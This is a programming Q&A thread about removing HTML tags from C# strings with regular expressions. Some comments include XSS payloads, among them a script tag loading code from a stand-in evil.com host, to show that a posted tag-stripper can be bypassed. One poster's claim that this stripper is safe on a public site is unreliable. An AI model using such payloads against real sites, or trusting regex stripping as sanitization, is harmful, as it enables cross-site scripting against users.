I am using the following regular expression to remove HTML tags from a string. It works, except that it leaves the closing tag behind. If I attempt to remove <a href="blah">blah</a>, it leaves the </a>.

I do not know regular expression syntax at all and fumbled through this. Can someone with regex knowledge please provide me with a pattern that will work?

Here is my code:

  string sPattern = @"<\/?!?(img|a)[^>]*>";
  Regex rgx = new Regex(sPattern);
  Match m = rgx.Match(sSummary);
  string sResult = "";
  if (m.Success)
   sResult = rgx.Replace(sSummary, "", 1);

I am looking to remove the first occurrence of the <a> and <img> tags.

+9  A: 

Using a regular expression to parse HTML is fraught with pitfalls. HTML is not a regular language and hence can't be 100% correctly parsed with a regex. This is just one of many problems you will run into. The best approach is to use an HTML / XML parser to do this for you.

Here is a link to a blog post I wrote a while back which goes into more detail about this problem.

That being said, here's a solution that should fix this particular problem. It is in no way a perfect solution, though.

// Capture the text between the first <img>/<a> tag and the next '<'.
var pattern = @"<(img|a)[^>]*>(?<content>[^<]*)<";
var regex = new Regex(pattern);
var m = regex.Match(sSummary);
if ( m.Success ) { 
  sResult = m.Groups["content"].Value;
}
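
If the goal is instead to drop the first <a> or <img> element entirely, link text included, a minimal sketch might look like the following. The class and method names (FirstTagRemover, RemoveFirst) are made up for illustration, and the pattern assumes simple, non-nested markup; it shares all the usual regex-on-HTML caveats.

```csharp
using System.Text.RegularExpressions;

public static class FirstTagRemover
{
    // Matches either a whole <a ...>...</a> element (lazy, so it stops at the
    // first closing tag) or a single <img ...> tag. The \b keeps "a" from
    // matching other tags such as <abbr>.
    private static readonly Regex FirstLinkOrImage = new Regex(
        @"<a\b[^>]*>.*?</a\s*>|<img\b[^>]*>",
        RegexOptions.IgnoreCase | RegexOptions.Singleline);

    // Removes only the first match (count = 1); later tags are left alone.
    public static string RemoveFirst(string html)
    {
        return FirstLinkOrImage.Replace(html, string.Empty, 1);
    }
}
```

Calling FirstTagRemover.RemoveFirst(sSummary) once removes whichever of the two comes first in the string. Matching the opening tag, content and closing tag as one unit is what avoids the leftover closing tag from the question.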
JaredPar
@downvoter, explanation?
JaredPar
Jared, this seems to throw an exception when I try it. Also, will this remove the text between the tags? I essentially want to remove the first occurrence of the a, p and img tags from the string.
Tony
@Tony, fixed a bug in the regex. Should compile now.
JaredPar
Thank you, I'll check it out.
Tony
+1  A: 

So the HTML parser everyone's talking about: http://htmlagilitypack.codeplex.com/

If it's clean XHTML, you can also use System.Xml.Linq.XDocument or System.Xml.XmlDocument.
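
For the clean-XHTML case, a rough sketch with System.Xml.Linq could look like this. The helper name RemoveFirstElement is hypothetical, and the input is assumed to be well-formed XML with a single root element; XDocument.Parse throws on typical tag soup (an unclosed <br>, for example), which is where an HTML parser such as the Html Agility Pack would be the better fit.

```csharp
using System.Linq;
using System.Xml.Linq;

public static class XhtmlCleaner
{
    // Removes the first element with the given tag name, including
    // everything inside it, and returns the remaining markup.
    public static string RemoveFirstElement(string xhtml, string tagName)
    {
        // PreserveWhitespace keeps the text nodes exactly as written.
        XDocument doc = XDocument.Parse(xhtml, LoadOptions.PreserveWhitespace);

        // Compare on LocalName so an XHTML namespace does not get in the way.
        XElement first = doc.Descendants()
            .FirstOrDefault(e => e.Name.LocalName == tagName);

        if (first != null)
            first.Remove();

        return doc.ToString(SaveOptions.DisableFormatting);
    }
}
```

Usage would be along the lines of XhtmlCleaner.RemoveFirstElement(sSummary, "a"), provided sSummary is wrapped in a single root element.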

Rei Miyasaka
A: 

Here's an extension method I created using a simple regular expression to remove HTML tags from a string:

/// <summary>
/// Converts an Html string to plain text, and replaces all br tags with line breaks.
/// </summary>
/// <returns></returns>
/// <remarks></remarks>
[Extension()]
public string ToPlainText(string s)
{

    s = s.Replace("<br>", Constants.vbCrLf);
    s = s.Replace("<br />", Constants.vbCrLf);
    s = s.Replace("<br/>", Constants.vbCrLf);


    s = Regex.Replace(s, "<[^>]*>", string.Empty);


    return s;
}

Hope that helps.

Breakskater
There's more than just <br> that ends with a slash; in fact, technically, any element can end with a slash -- and it might not necessarily be with one or no spaces following it or trailing it. This is also valid: `<p / >`
Rei Miyasaka
Those lines are just there to preserve line breaks, if needed. Otherwise, they may be removed.
Breakskater
Nice, where are you using this? On a public web site? Entering '<script src="http://evil.com/evil.js" ' (notice no ">" character) is enough to exploit it :D
VirtualBlackFox
Rei, it will remove <p / >. You haven't even tested it.
Breakskater
VirtualBlackFox, yes, I am using it on a public web site, and quite effectively. '<script src="http://evil.com/evil.js" ' is malformed and will not run, so that is a moot point.
Breakskater
A bit off topic, but are you really using the `Microsoft.VisualBasic.Constants` class in C#? You should use `System.Environment.NewLine` instead of `Microsoft.VisualBasic.Constants.vbCrLf`, in both C# and VB. Or if you insist on using a platform-dependent constant, use `"\r\n"`, which is much shorter. In any case, the whole `Microsoft.VisualBasic` namespace/assembly is basically one big crutch that is best avoided.
Allon Guralnek
Also, in C#, to define an extension method you simply put the keyword `this` before the definition of the first parameter (e.g. `... ToPlainText(this string s)`), and then you can omit the `[Extension()]` attribute. Even if you did use the attribute, when specifying an attribute that has an empty argument list, you can omit the parentheses (e.g. `[Extension]`).
Allon Guralnek
Yes, that's a totally moot point... OK, to celebrate the week of the great Twitter worm, a working sample, Twitter style ------> <div style="position:absolute; left:0; top:0; width:10000; height:10000;" onmousemove="window.alert('I can haz xss cheezburger');"
VirtualBlackFox
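
Pulling the comments on this answer together, a sketch of the same helper in idiomatic C# might look like this: the `this` modifier instead of `[Extension()]`, `Environment.NewLine` instead of `vbCrLf`, and one pattern for the `<br>` variants. The class name HtmlStringExtensions is an assumption (extension methods need some static class to live in). It is still a plain tag stripper, not a sanitizer: a fragment with no closing ">" passes through unchanged.

```csharp
using System;
using System.Text.RegularExpressions;

public static class HtmlStringExtensions
{
    // The "this" modifier on the first parameter makes this an extension
    // method, so it can be called as someString.ToPlainText().
    public static string ToPlainText(this string s)
    {
        // One pattern covers <br>, <br/>, <br /> and <BR>.
        s = Regex.Replace(s, @"<br\s*/?\s*>", Environment.NewLine,
                          RegexOptions.IgnoreCase);

        // Remove every remaining complete tag. Anything that never reaches
        // a closing '>' does not match and is left in the output.
        return Regex.Replace(s, "<[^>]*>", string.Empty);
    }
}
```

Because unclosed fragments survive, output destined for a web page would still need to be HTML-encoded before it is rendered.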
+1  A: 

You can use existing libraries to strip out the HTML tags. One good one is the Chilkat C# library.

A_Var
This is all well and good, but I not only need to remove the tag, I need to remove everything between the tags.
Tony